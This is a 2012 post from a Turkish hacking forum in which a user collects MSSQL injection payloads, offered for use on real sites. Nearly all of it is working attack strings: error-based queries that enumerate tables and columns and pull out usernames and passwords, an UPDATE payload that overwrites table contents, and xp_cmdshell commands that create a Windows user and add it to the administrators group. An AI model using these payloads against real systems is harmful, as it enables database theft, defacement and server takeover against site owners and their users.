THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

MSSQL Kodları //SkyNet

| SkyNet | - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
06/2011
Nereden:
Kanada
Mesajlar:
1.041
Konular:
221
Teşekkür (Etti):
0
Teşekkür (Aldı):
238
Ticaret:
(0) %
02-04-2012 23:10
#1
MSSQL Kodları //SkyNet
Biliyorsunuz ki windows sistemlerde database türü mssql'dir.
mssql injection yaparken kullanabileceğimiz bikaç yararlı kodu topladım buyrun:


Kod:
and 1=convert(int,(select top 1 name from sysobjects)) > İlk tablo adını bulma 

and 1=convert(int,(select top 1 name from sysobjects where name>'tablo adı')) Harfden yada tablo adından diğer tablo adlarını bulma


and 1=convert(int, (select top 1 name from syscolumns where colid=1 and id=(select top 1 id from sysobjects where xtype='u' and name='tablo adı')))

Kolon bulma

and 1=convert(int,(select top 1 KolonADı from Tablo Adı))

Username ve pass çıkarma.

Kolon adı yerine kolon adı Tablo adıyada tablo adı

--------------------

unclosed hatası alındığında sunucuya kullanıcı hesabı verme ve o hesabı administrator yetkisine ulaştırma kodu:
(convert(int,(select+user));-- bunu yazdığınızda dbo gelmeli yoksa yapamazsınız)

;exec%20master..xp_cmdshell 'net user portechine portechine /add';--

;exec%20master..xp_cmdshell 'net localgroup administrators portechine /add';--


--------------------

unclosed hatası alındığında kullanılabilen update yönteminin komutu:

+update+tablo_adi+set+colon_adi='yazilacak yazi';--

--------------------


makina adi
and 1=convert(int, @@servername);--

version 
and 1=convert(int, @@version);--


servis adi 
and 1=convert(int, @@servicename);-- 


DB adlari 
and 1=convert(int, db_name(0));--


Tablolar 
and 1=convert(int, (select top 1 name from sysobjects where xtype='u'and name>'cdm'));--


COLON bulurklen
and 1=convert(int, (select top 1 name from syscolumns where colid=12 and id=(select top 1 id from sysobjects where xtype='u' and name='tbl_Kerkuk_Nivis')));--


DAta okuma
and 1=convert(int, (select top 1 mesaj from tbl_Arziman where nimre>6));--

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler